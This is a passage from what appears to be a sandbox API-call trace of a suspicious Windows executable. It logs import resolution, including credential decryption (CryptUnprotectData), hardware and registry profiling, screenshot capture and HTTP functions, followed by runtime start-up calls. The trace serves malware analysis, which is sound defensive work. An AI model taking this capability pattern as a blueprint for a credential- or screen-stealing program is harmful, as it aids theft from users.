(hModule=0x76e10000, lpProcName="FreeLibrary") returned 0x76e234c8 [0085.098] GetProcAddress (hModule=0x76e10000, lpProcName="GetPrivateProfileSectionNamesA") returned 0x76e9a1c9 [0085.098] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileAttributesW") returned 0x76e21b18 [0085.098] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSection") returned 0x77352c42 [0085.098] GetProcAddress (hModule=0x76e10000, lpProcName="InterlockedCompareExchange") returned 0x76e21484 [0085.098] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteCriticalSection") returned 0x773545f5 [0085.098] GetProcAddress (hModule=0x76e10000, lpProcName="EnterCriticalSection") returned 0x773422b0 [0085.098] GetProcAddress (hModule=0x76e10000, lpProcName="LeaveCriticalSection") returned 0x77342270 [0085.098] GetProcAddress (hModule=0x76e10000, lpProcName="AreFileApisANSI") returned 0x76ea40d1 [0085.098] GetProcAddress (hModule=0x76e10000, lpProcName="SetFilePointer") returned 0x76e217d1 [0085.099] GetProcAddress (hModule=0x76e10000, lpProcName="SetEndOfFile") returned 0x76e3ce2e [0085.099] GetProcAddress (hModule=0x76e10000, lpProcName="FlushFileBuffers") returned 0x76e2469b [0085.099] GetProcAddress (hModule=0x76e10000, lpProcName="UnlockFile") returned 0x76e4cf36 [0085.099] GetProcAddress (hModule=0x76e10000, lpProcName="LockFile") returned 0x76e4cf1e [0085.099] GetProcAddress (hModule=0x76e10000, lpProcName="LockFileEx") returned 0x76e4d57c [0085.099] GetProcAddress (hModule=0x76e10000, lpProcName="UnlockFileEx") returned 0x76e4d594 [0085.099] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileAttributesA") returned 0x76e25414 [0085.099] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileAttributesExW") returned 0x76e24574 [0085.099] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryW") returned 0x76e2492b [0085.099] GetProcAddress (hModule=0x76e10000, lpProcName="QueryPerformanceCounter") returned 0x76e21725 [0085.099] GetProcAddress (hModule=0x76e10000, lpProcName="GetTickCount") returned 0x76e2110c [0085.099] GetProcAddress (hModule=0x76e10000, lpProcName="GetSystemTime") returned 0x76e25a96 [0085.099] GetProcAddress (hModule=0x76e10000, lpProcName="GetSystemTimeAsFileTime") returned 0x76e23509 [0085.099] GetProcAddress (hModule=0x76e10000, lpProcName="UnmapViewOfFile") returned 0x76e21826 [0085.100] GetProcAddress (hModule=0x76e10000, lpProcName="SetCurrentDirectoryA") returned 0x76e31834 [0085.100] GetProcAddress (hModule=0x76e10000, lpProcName="GetTempPathW") returned 0x76e3d4dc [0085.100] GetProcAddress (hModule=0x76e10000, lpProcName="FormatMessageA") returned 0x76e45fbd [0085.100] GetProcAddress (hModule=0x76e10000, lpProcName="FormatMessageW") returned 0x76e24620 [0085.100] GetProcAddress (hModule=0x76e10000, lpProcName="GetFullPathNameA") returned 0x76e2e2c1 [0085.100] GetProcAddress (hModule=0x76e10000, lpProcName="GetFullPathNameW") returned 0x76e240d4 [0085.100] GetProcAddress (hModule=0x76e10000, lpProcName="GetDiskFreeSpaceA") returned 0x76ea433f [0085.100] GetProcAddress (hModule=0x76e10000, lpProcName="GetDiskFreeSpaceW") returned 0x76e3f7aa [0085.100] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileW") returned 0x76e23f5c [0085.100] GetProcAddress (hModule=0x76e10000, lpProcName="GetSystemInfo") returned 0x76e249ca [0085.100] GetProcAddress (hModule=0x76e10000, lpProcName="MapViewOfFile") returned 0x76e218f1 [0085.100] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileMappingA") returned 0x76e25506 [0085.100] GetProcAddress (hModule=0x76e10000, lpProcName="GetComputerNameA") returned 0x76e3b6e0 [0085.101] GetProcAddress (hModule=0x76e10000, lpProcName="IsWow64Process") returned 0x76e2195e [0085.101] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcess") returned 0x76e21809 [0085.101] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalMemoryStatus") returned 0x76e28b6d [0085.101] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleA") returned 0x76e21245 [0085.101] GetProcAddress (hModule=0x76e10000, lpProcName="GetUserDefaultLocaleName") returned 0x76ea47c1 [0085.101] GetProcAddress (hModule=0x76e10000, lpProcName="TzSpecificLocalTimeToSystemTime") returned 0x76e4066a [0085.101] GetProcAddress (hModule=0x76e10000, lpProcName="GetTimeZoneInformation") returned 0x76e2465a [0085.101] GetProcAddress (hModule=0x76e10000, lpProcName="GetLocaleInfoA") returned 0x76e3d5e5 [0085.101] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileSizeEx") returned 0x76e259e2 [0085.101] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileInformationByHandle") returned 0x76e253ae [0085.101] GetProcAddress (hModule=0x76e10000, lpProcName="SystemTimeToFileTime") returned 0x76e25a7e [0085.101] GetProcAddress (hModule=0x76e10000, lpProcName="GetLocalTime") returned 0x76e25aa6 [0085.101] GetProcAddress (hModule=0x76e10000, lpProcName="CompareStringW") returned 0x76e23bca [0085.101] GetProcAddress (hModule=0x76e10000, lpProcName="SetStdHandle") returned 0x76ea454f [0085.102] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidLocale") returned 0x76e3ce46 [0085.102] GetProcAddress (hModule=0x76e10000, lpProcName="EnumSystemLocalesA") returned 0x76e4287b [0085.102] GetProcAddress (hModule=0x76e10000, lpProcName="GetUserDefaultLCID") returned 0x76e23da5 [0085.102] GetProcAddress (hModule=0x76e10000, lpProcName="GetLocaleInfoW") returned 0x76e23c42 [0085.102] GetProcAddress (hModule=0x76e10000, lpProcName="GetStringTypeW") returned 0x76e21946 [0085.102] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameA") returned 0x76e214b1 [0085.104] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentStringsW") returned 0x76e251e3 [0085.104] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcessId") returned 0x76e211f8 [0085.104] GetProcAddress (hModule=0x76e10000, lpProcName="Sleep") returned 0x76e210ff [0085.104] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteFileA") returned 0x76e25444 [0085.104] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0085.105] GetProcAddress (hModule=0x76e10000, lpProcName="GetLogicalDriveStringsA") returned 0x76e2e4dc [0085.105] GetProcAddress (hModule=0x76e10000, lpProcName="GetDriveTypeA") returned 0x76e3ef75 [0085.105] GetProcAddress (hModule=0x76e10000, lpProcName="lstrlenA") returned 0x76e25a4b [0085.105] GetProcAddress (hModule=0x76e10000, lpProcName="CreateDirectoryW") returned 0x76e24259 [0085.105] GetProcAddress (hModule=0x76e10000, lpProcName="CopyFileW") returned 0x76e4830d [0085.105] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpyW") returned 0x76e43102 [0085.105] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcatW") returned 0x76e4828e [0085.105] GetProcAddress (hModule=0x76e10000, lpProcName="FindFirstFileW") returned 0x76e24435 [0085.105] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcmpW") returned 0x76e25929 [0085.106] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteFileW") returned 0x76e289b3 [0085.106] GetProcAddress (hModule=0x76e10000, lpProcName="FindNextFileW") returned 0x76e254ee [0085.106] GetProcAddress (hModule=0x76e10000, lpProcName="FindClose") returned 0x76e24442 [0085.106] GetProcAddress (hModule=0x76e10000, lpProcName="HeapFree") returned 0x76e214c9 [0085.106] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcessHeap") returned 0x76e214e9 [0085.106] GetProcAddress (hModule=0x76e10000, lpProcName="HeapAlloc") returned 0x7734e026 [0085.106] GetProcAddress (hModule=0x76e10000, lpProcName="WideCharToMultiByte") returned 0x76e2170d [0085.106] GetProcAddress (hModule=0x76e10000, lpProcName="FreeEnvironmentStringsW") returned 0x76e251cb [0085.106] GetProcAddress (hModule=0x76e10000, lpProcName="SetEnvironmentVariableA") returned 0x76e2e331 [0085.107] GetProcAddress (hModule=0x76e10000, lpProcName="SetEnvironmentVariableW") returned 0x76e289f1 [0085.107] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleMode") returned 0x76e21328 [0085.107] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleCP") returned 0x76ec7bff [0085.107] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameW") returned 0x76e24950 [0085.107] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidCodePage") returned 0x76e24493 [0085.107] GetProcAddress (hModule=0x76e10000, lpProcName="GetOEMCP") returned 0x76e4d1a1 [0085.107] GetProcAddress (hModule=0x76e10000, lpProcName="LocalFree") returned 0x76e22d3c [0085.107] GetProcAddress (hModule=0x76e10000, lpProcName="LocalAlloc") returned 0x76e2168c [0085.107] GetProcAddress (hModule=0x76e10000, lpProcName="GetTempPathA") returned 0x76e4276c [0085.108] GetProcAddress (hModule=0x76e10000, lpProcName="GetACP") returned 0x76e2179c [0085.108] GetProcAddress (hModule=0x76e10000, lpProcName="HeapCreate") returned 0x76e24a2d [0085.108] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileType") returned 0x76e23531 [0085.108] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76e21916 [0085.108] GetProcAddress (hModule=0x76e10000, lpProcName="GetStdHandle") returned 0x76e251b3 [0085.108] GetProcAddress (hModule=0x76e10000, lpProcName="SetHandleCount") returned 0x76e2cb29 [0085.108] GetProcAddress (hModule=0x76e10000, lpProcName="HeapSize") returned 0x77353002 [0085.108] GetProcAddress (hModule=0x76e10000, lpProcName="IsDebuggerPresent") returned 0x76e24a5d [0085.108] GetProcAddress (hModule=0x76e10000, lpProcName="SetUnhandledExceptionFilter") returned 0x76e287c9 [0085.108] GetProcAddress (hModule=0x76e10000, lpProcName="UnhandledExceptionFilter") returned 0x76e4772f [0085.109] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentThreadId") returned 0x76e21450 [0085.109] GetProcAddress (hModule=0x76e10000, lpProcName="SetLastError") returned 0x76e211a9 [0085.109] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleW") returned 0x76e234b0 [0085.109] GetProcAddress (hModule=0x76e10000, lpProcName="TlsFree") returned 0x76e23587 [0085.109] GetProcAddress (hModule=0x76e10000, lpProcName="TlsSetValue") returned 0x76e214fb [0085.109] GetProcAddress (hModule=0x76e10000, lpProcName="TlsGetValue") returned 0x76e211e0 [0085.109] GetProcAddress (hModule=0x76e10000, lpProcName="TlsAlloc") returned 0x76e249ad [0085.109] GetProcAddress (hModule=0x76e10000, lpProcName="IsProcessorFeaturePresent") returned 0x76e25235 [0085.109] GetProcAddress (hModule=0x76e10000, lpProcName="GetCPInfo") returned 0x76e25189 [0085.110] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringW") returned 0x76e217b9 [0085.110] GetProcAddress (hModule=0x76e10000, lpProcName="GetStartupInfoW") returned 0x76e24d40 [0085.110] GetProcAddress (hModule=0x76e10000, lpProcName="HeapSetInformation") returned 0x76e25651 [0085.110] GetProcAddress (hModule=0x76e10000, lpProcName="GetCommandLineA") returned 0x76e251a1 [0085.110] GetProcAddress (hModule=0x76e10000, lpProcName="HeapReAlloc") returned 0x77361f6e [0085.110] GetProcAddress (hModule=0x76e10000, lpProcName="RtlUnwind") returned 0x76e4d1c3 [0085.110] GetProcAddress (hModule=0x76e10000, lpProcName="RaiseException") returned 0x76e258a6 [0085.110] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0085.110] GetProcAddress (hModule=0x76e10000, lpProcName="InterlockedIncrement") returned 0x76e21400 [0085.111] GetProcAddress (hModule=0x76e10000, lpProcName="InterlockedDecrement") returned 0x76e213f0 [0085.111] GetProcAddress (hModule=0x76e10000, lpProcName="InterlockedExchange") returned 0x76e21462 [0085.111] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0085.111] GetProcAddress (hModule=0x76e10000, lpProcName="WriteConsoleW") returned 0x76e47aca [0085.111] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76780000 [0085.111] GetProcAddress (hModule=0x76780000, lpProcName="GetDesktopWindow") returned 0x767a0a19 [0085.111] GetProcAddress (hModule=0x76780000, lpProcName="GetSystemMetrics") returned 0x76797d2f [0085.111] GetProcAddress (hModule=0x76780000, lpProcName="GetDC") returned 0x767972c4 [0085.111] GetProcAddress (hModule=0x76780000, lpProcName="CharToOemA") returned 0x767a4fee [0085.111] GetProcAddress (hModule=0x76780000, lpProcName="EnumDisplayDevicesW") returned 0x767be567 [0085.112] GetProcAddress (hModule=0x76780000, lpProcName="MessageBoxA") returned 0x767efd1e [0085.112] GetProcAddress (hModule=0x76780000, lpProcName="GetKeyboardLayoutList") returned 0x767a2e69 [0085.112] GetProcAddress (hModule=0x76780000, lpProcName="wsprintfA") returned 0x767aae5f [0085.112] GetProcAddress (hModule=0x76780000, lpProcName="ReleaseDC") returned 0x76797446 [0085.112] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x752d0000 [0085.112] GetProcAddress (hModule=0x752d0000, lpProcName="CreateCompatibleBitmap") returned 0x752e5f49 [0085.112] GetProcAddress (hModule=0x752d0000, lpProcName="SelectObject") returned 0x752e4f70 [0085.112] GetProcAddress (hModule=0x752d0000, lpProcName="BitBlt") returned 0x752e5ea6 [0085.112] GetProcAddress (hModule=0x752d0000, lpProcName="DeleteObject") returned 0x752e5689 [0085.112] GetProcAddress (hModule=0x752d0000, lpProcName="CreateDCA") returned 0x752e7bcc [0085.112] GetProcAddress (hModule=0x752d0000, lpProcName="GetDeviceCaps") returned 0x752e4de0 [0085.113] GetProcAddress (hModule=0x752d0000, lpProcName="CreateCompatibleDC") returned 0x752e54f4 [0085.113] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x754b0000 [0085.113] GetProcAddress (hModule=0x754b0000, lpProcName="RegGetValueW") returned 0x754c0e47 [0085.113] GetProcAddress (hModule=0x754b0000, lpProcName="RegOpenKeyExA") returned 0x754c4907 [0085.113] GetProcAddress (hModule=0x754b0000, lpProcName="RegQueryValueExA") returned 0x754c48ef [0085.113] GetProcAddress (hModule=0x754b0000, lpProcName="GetUserNameA") returned 0x754da4b4 [0085.113] GetProcAddress (hModule=0x754b0000, lpProcName="GetCurrentHwProfileA") returned 0x754f11f8 [0085.113] GetProcAddress (hModule=0x754b0000, lpProcName="RegOpenKeyExW") returned 0x754c468d [0085.113] GetProcAddress (hModule=0x754b0000, lpProcName="RegCloseKey") returned 0x754c469d [0085.113] GetProcAddress (hModule=0x754b0000, lpProcName="RegGetValueA") returned 0x754ba9dd [0085.113] GetProcAddress (hModule=0x754b0000, lpProcName="RegEnumKeyExA") returned 0x754c1481 [0085.114] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75670000 [0085.135] GetProcAddress (hModule=0x75670000, lpProcName="ShellExecuteA") returned 0x758b7078 [0085.135] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathA") returned 0x75787804 [0085.135] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x762c0000 [0085.139] GetProcAddress (hModule=0x762c0000, lpProcName="CoCreateInstance") returned 0x76309d0b [0085.139] GetProcAddress (hModule=0x762c0000, lpProcName="CoUninitialize") returned 0x763086d3 [0085.139] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x753b0000 [0085.139] GetProcAddress (hModule=0x753b0000, lpProcName="PathMatchSpecW") returned 0x753c86f7 [0085.139] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x75550000 [0085.144] GetProcAddress (hModule=0x75550000, lpProcName="CryptStringToBinaryA") returned 0x75585d77 [0085.144] GetProcAddress (hModule=0x75550000, lpProcName="CryptUnprotectData") returned 0x75585a7f [0085.144] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x74fe0000 [0085.145] GetProcAddress (hModule=0x74fe0000, lpProcName="GetModuleFileNameExA") returned 0x74fe15bc [0085.145] GetProcAddress (hModule=0x74fe0000, lpProcName="GetModuleBaseNameA") returned 0x74fe15a4 [0085.145] GetProcAddress (hModule=0x74fe0000, lpProcName="EnumProcessModules") returned 0x74fe1408 [0085.145] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75190000 [0085.159] GetProcAddress (hModule=0x75190000, lpProcName="InternetCloseHandle") returned 0x751aab49 [0085.159] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenUrlA") returned 0x751d30f1 [0085.160] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenA") returned 0x751bf18e [0085.160] GetProcAddress (hModule=0x75190000, lpProcName="HttpAddRequestHeadersA") returned 0x751adcd2 [0085.160] GetProcAddress (hModule=0x75190000, lpProcName="InternetSetOptionA") returned 0x751a75e8 [0085.160] GetProcAddress (hModule=0x75190000, lpProcName="InternetConnectA") returned 0x751b49e9 [0085.160] GetProcAddress (hModule=0x75190000, lpProcName="HttpOpenRequestA") returned 0x751b4c7d [0085.160] GetProcAddress (hModule=0x75190000, lpProcName="HttpQueryInfoA") returned 0x751aa33e [0085.161] GetProcAddress (hModule=0x75190000, lpProcName="InternetReadFile") returned 0x751ab406 [0085.161] GetProcAddress (hModule=0x75190000, lpProcName="InternetSetFilePointer") returned 0x7520af16 [0085.161] GetProcAddress (hModule=0x75190000, lpProcName="HttpSendRequestA") returned 0x752218f8 [0085.161] LoadLibraryA (lpLibFileName="gdiplus.dll") returned 0x734a0000 [0088.598] GetProcAddress (hModule=0x734a0000, lpProcName="GdiplusStartup") returned 0x734c5600 [0088.598] GetProcAddress (hModule=0x734a0000, lpProcName="GdiplusShutdown") returned 0x734c56be [0088.599] GetProcAddress (hModule=0x734a0000, lpProcName="GdipGetImageEncodersSize") returned 0x734e2203 [0088.599] GetProcAddress (hModule=0x734a0000, lpProcName="GdipCreateBitmapFromHBITMAP") returned 0x734d6671 [0088.599] GetProcAddress (hModule=0x734a0000, lpProcName="GdipCloneImage") returned 0x734d4bfa [0088.599] GetProcAddress (hModule=0x734a0000, lpProcName="GdipSaveImageToFile") returned 0x734d41fd [0088.599] GetProcAddress (hModule=0x734a0000, lpProcName="GdipFree") returned 0x734e24b2 [0088.599] GetProcAddress (hModule=0x734a0000, lpProcName="GdipAlloc") returned 0x734e2437 [0088.599] GetProcAddress (hModule=0x734a0000, lpProcName="GdipGetImageEncoders") returned 0x734e228c [0088.599] GetProcAddress (hModule=0x734a0000, lpProcName="GdipDisposeImage") returned 0x734d4cc8 [0088.599] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x743e0000 [0088.610] GetProcAddress (hModule=0x743e0000, lpProcName="atexit") returned 0x743fc544 [0088.610] atexit (param_1=0x1bd0920) returned 0 [0088.611] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f4a8 | out: lpSystemTimeAsFileTime=0x18f4a8*(dwLowDateTime=0xa220a760, dwHighDateTime=0x1d5d6b4)) [0088.611] GetCurrentProcessId () returned 0x964 [0088.611] GetCurrentThreadId () returned 0x974 [0088.611] GetTickCount () returned 0x115b922 [0088.611] QueryPerformanceCounter (in: lpPerformanceCount=0x18f4a0 | out: lpPerformanceCount=0x18f4a0*=22988484605) returned 1 [0088.611] GetStartupInfoW (in: lpStartupInfo=0x18f44c | out: lpStartupInfo=0x18f44c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18f4b0, hStdError=0x466d11)) [0088.611] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0088.611] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1dc0000 [0088.612] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0088.612] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0088.612] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0088.612] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0088.613] GetProcAddress (hModule=0x76e10000, lpProcName="FlsFree") returned 0x76e2359f [0088.613] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x214) returned 0x1dc07d0 [0088.614] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0088.614] GetCurrentThreadId () returned 0x974 [0088.614] GetStartupInfoW (in: lpStartupInfo=0x18f3e8 | out: lpStartupInfo=0x18f3e8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x45e4c0, hStdOutput=0x45e7f9, hStdError=0x1dc07d0)) [0088.614] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x800) returned 0x1dc09f0 [0088.614] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0088.614] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0088.614] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0088.614] SetHandleCount (uNumber=0x20) returned 0x20 [0088.614] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\5.exe\" " [0088.614] GetEnvironmentStringsW () returned 0x3744a0* [0088.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0088.615] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x565) returned 0x1dc11f8 [0088.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x1dc11f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0088.615] FreeEnvironmentStringsW (penv=0x3744a0) returned 1 [0088.615] GetLastError () returned 0x0 [0088.615] SetLastError (dwErrCode=0x0) [0088.615] GetLastError () returned 0x0 [0088.615] SetLastError (dwErrCode=0x0) [0088.615] GetLastError () returned 0x0 [0088.615] SetLastError (dwErrCode=0x0) [0088.615] GetACP () returned 0x4e4 [0088.615] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x220) returned 0x1dc1768 [0088.615] GetLastError () returned 0x0 [0088.615] SetLastError (dwErrCode=0x0) [0088.615] IsValidCodePage (CodePage=0x4e4) returned 1 [0088.615] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f3b0 | out: lpCPInfo=0x18f3b0) returned 1 [0088.615] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ee7c | out: lpCPInfo=0x18ee7c) returned 1 [0088.616] GetLastError () returned 0x0 [0088.616] SetLastError (dwErrCode=0x0) [0088.616] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f290, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0088.616] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f290, cbMultiByte=256, lpWideCharStr=0x18ebf8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\xfde1臺淬FĀ") returned 256 [0088.616] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\xfde1臺淬FĀ", cchSrc=256, lpCharType=0x18ee90 | out: lpCharType=0x18ee90) returned 1 [0088.616] GetLastError () returned 0x0 [0088.616] SetLastError (dwErrCode=0x0) [0088.616] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f290, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0088.616] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f290, cbMultiByte=256, lpWideCharStr=0x18ebc8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ빨EĀ") returned 256 [0088.616] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ빨EĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0088.616] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ빨EĀ", cchSrc=256, lpDestStr=0x18e9b8, cchDest=256 | out: lpDestStr=" 